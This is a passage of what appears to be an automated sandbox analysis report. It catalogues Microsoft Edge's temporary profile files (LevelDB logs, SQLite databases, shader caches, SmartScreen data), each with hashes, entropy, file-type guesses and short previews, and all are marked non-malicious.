                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):46
                                                                                                              Entropy (8bit):4.019797536844534
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                              MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                              SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                              SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                              SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                              Malicious:false
                                                                                                              Preview:...n'................_mts_schema_descriptor...

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):271
                                                                                                              Entropy (8bit):5.334029212355882
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Yxijv1e0i23fQXBx2KLlaxmRL+q2Pe0i23fQXpIFUv:YwdZWBVLQ05+vvZWmFUv
                                                                                                              MD5:41EAF5AB31B8BA7A4F72F1F69F827B71
                                                                                                              SHA1:5AE858BC7FBE3B5C4C6F29DC1A31F8C5612B8674
                                                                                                              SHA-256:FBC00A843EE79ABE3970FA3EF7FE14B5E7D384FEB0FEF6FFC7F9D4163B9B7E24
                                                                                                              SHA-512:CEA7AE26A3C27DDAF24EC429407990449C34E6BFB55AA369F310DDF6B8A2E778FFE0938602C81AF978879F7A3FADCCF55EDA0AAE48D732E7EFCFB9264CC5AD91
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:42.704 b3c Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB since it was missing..2024/12/05-04:39:42.740 b3c Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Top Sites

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.3528485475628876
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                              MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                              SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                              SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                              SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Visited Links

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):131072
                                                                                                              Entropy (8bit):0.002110589502647469
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ImtVEt:IiV
                                                                                                              MD5:4DC7FD29AC2DCA6B36EDEB88E0BE660E
                                                                                                              SHA1:0AECF24EDA9BFBF4B8B3A7D70952C88FCEFC501C
                                                                                                              SHA-256:3285D8971E803CA56E60B9E7B04A4BA80D7063451B28E8ED194E7A4B5398FDE7
                                                                                                              SHA-512:09233CC8CD26AEB459661ACB79C7053609661390A51C0930C1C58606C26E15211F1ACC7833FA9B9114BBE64BA5DFA668D3DDCA2BF5FCCDA2F6643CAEC18B7CCB
                                                                                                              Malicious:false
                                                                                                              Preview:VLnk.....?......>.-...u.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Web Data

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):178176
                                                                                                              Entropy (8bit):0.9401384989520177
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Qrb2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+c:Q/2qOB1nxCkvSAELyKOMq+c
                                                                                                              MD5:6817EEA7CE56E1AB1ECF93C090727E0F
                                                                                                              SHA1:49A10B3D157FB49768284F68335CC7B378FB13B4
                                                                                                              SHA-256:FF7B98237D2FA7537470A573B9FD12D9C656EDACC0949AA12B75970528F650CD
                                                                                                              SHA-512:6E14A0B0A47B493493F6C0C8C2A15028C0C1D53E247D1FB2D227DC772ACFB6ADF2B74CBC8FB223156A1D39A1295FFF7EC054E9BE51DBF7BCE61CC597510C4EAE
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ .......W...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\Web Data-journal

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2568
                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:rHl1lOtlm:rHj
                                                                                                              MD5:99518598866CF43C91C7359B66BD5328
                                                                                                              SHA1:DF794E54F04165352B13314A48786FBC986BA43E
                                                                                                              SHA-256:8F50EB182ABA80109CD38A145427FC4AA2AE381D0AAAC68B27F2A0DCF3D252CB
                                                                                                              SHA-512:465CA69AA0F1FA5F29BE13B88F28088833885396D210E60FCB830F2BE78E690AFBB755B4284B223C241EDE6B99F924A461A505338993B1A08BEDABE18BCA4E3A
                                                                                                              Malicious:false
                                                                                                              Preview:..............D....W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\arbitration_service_config.json

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):11417
                                                                                                              Entropy (8bit):5.237554345326078
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                              Malicious:false
                                                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\b24d780c-d22e-4d1e-b257-e8aa7368205e.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:L:L
                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                              Malicious:false
                                                                                                              Preview:.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):269
                                                                                                              Entropy (8bit):5.416690936367549
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:YSAn4M1e0i23fQXfrl2KLlauVq2Pe0i23fQXfrK+IFUv:YS84kZW1LQEvvZW23FUv
                                                                                                              MD5:3CE69FB27CDD3B7F757050B49444E9CB
                                                                                                              SHA1:FAF21F72B9C1F9EFD2D2BF7B5D0CEC141B2433BC
                                                                                                              SHA-256:63B3396FEAAA1B5A6CEDA2F82C965B708856F50B7DB018D570E55223815A6A3D
                                                                                                              SHA-512:764FD24B1ED6CB932DF12F985E1C81143151D4BE7AD61F808910CAE4C3AF51DFDD45E63E65BE370C9C9B6B92F6F6965A124EB2C9D3942B4F2128F680ADAFA8B2
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:43.768 1e44 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db since it was missing..2024/12/05-04:39:43.797 1e44 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16
                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                              Malicious:false
                                                                                                              Preview:MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata\000003.log

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):34
                                                                                                              Entropy (8bit):3.2608241254905095
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:G0XttkJcsn:G0Xtqcs
                                                                                                              MD5:144F9E14F35606E2067B5DF655E3102E
                                                                                                              SHA1:B16B22A620A679A811068E67C65C67F97500BEC9
                                                                                                              SHA-256:BCA6A12EEF67DFB649266150CA95D24212F5F566182B85267694969575C5AB4C
                                                                                                              SHA-512:9C148840D66B9D7C2C55668A25E2D2AAE328A4F11016D440C7F5D930D53ABA0DC3DFF74552EC18A89EEBD370B09BD0A5F21A70F8A0D8B1847D1FE40BDFEFA4EC
                                                                                                              Malicious:false
                                                                                                              Preview:.h.6.................__global... .

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata\LOG

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):287
                                                                                                              Entropy (8bit):5.353650430046644
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Yr84M1e0i23fQXfrzs52KLlaSA+q2Pe0i23fQXfrzAdIFUv:Yr84kZWs9LQS5vvZW9FUv
                                                                                                              MD5:28A464D869FEB11A7079FCBF28A017CD
                                                                                                              SHA1:EE14566FCED9FFB24A31FC465DD5A0CBB1099B1C
                                                                                                              SHA-256:448801A7FB15EC1966155AA84FE304EBA887866C126E3AE09DA2B9D4A4C6E5BB
                                                                                                              SHA-512:588ADCF5519E305BEC044175FD4150C91960413A5376BEDBC81E2EB453643482729EF7AB713CFF87A08BD061007295F292AF491B51BE090414EC315AAA7B7BCE
                                                                                                              Malicious:false
                                                                                                              Preview:2024/12/05-04:39:43.743 1e44 Creating DB C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata since it was missing..2024/12/05-04:39:43.768 1e44 Reusing MANIFEST C:\Users\user~1\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:OpenPGP Secret Key
                                                                                                              Category:dropped
                                                                                                              Size (bytes):41
                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                              Malicious:false
                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Last Version

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13
                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                              Malicious:false
                                                                                                              Preview:117.0.2045.47

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\Nurturing\campaign_history

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                              Category:dropped
                                                                                                              Size (bytes):20480
                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\ShaderCache\data_0

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                              Malicious:false
                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\ShaderCache\data_1

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.012096502606932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsEllllkXl:/M/6
                                                                                                              MD5:259E7ED5FB3C6C90533B963DA5B2FC1B
                                                                                                              SHA1:DF90EABDA434CA50828ABB039B4F80B7F051EC77
                                                                                                              SHA-256:35BB2F189C643DCF52ECF037603D104035ECDC490BF059B7736E58EF7D821A09
                                                                                                              SHA-512:9D401053AC21A73863B461B0361DF1A17850F42FD5FC7A77763A124AA33F2E9493FAD018C78CDFF63CA10F6710E53255CE891AD6EC56EC77D770C4630F274933
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\ShaderCache\data_2

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):8192
                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                              Malicious:false
                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\ShaderCache\index

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):262512
                                                                                                              Entropy (8bit):9.448177365217996E-4
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:LsNlwT9L/ll:Ls3wxL/ll
                                                                                                              MD5:7B2546A6DF5507C494AEF8D9414ACCA9
                                                                                                              SHA1:CC985D238C6A706080DD420A5E04DAC9C3A1AF1B
                                                                                                              SHA-256:1D388BF3D6B944FCAFDEBCDBB36001A7A3E3328F15293D7DBE26E034635E5E3F
                                                                                                              SHA-512:CC22CCDE780311478B9AFE9977A7C6A51391573F755E1E0DA96D133EE220F8557E679CC5897DAA837FCC51DDA18C486EDA7408AC8785D176853806FF9790AABE
                                                                                                              Malicious:false
                                                                                                              Preview:..........................................".../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29
                                                                                                              Entropy (8bit):3.922828737239167
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:2NGw+K+:fwZ+
                                                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                              Malicious:false
                                                                                                              Preview:customSynchronousLookupUris_0

                                                                                                              C:\Users\user\AppData\Local\Temp\chrBB3.tmp\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):35302
                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                              Malicious:false
                                                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

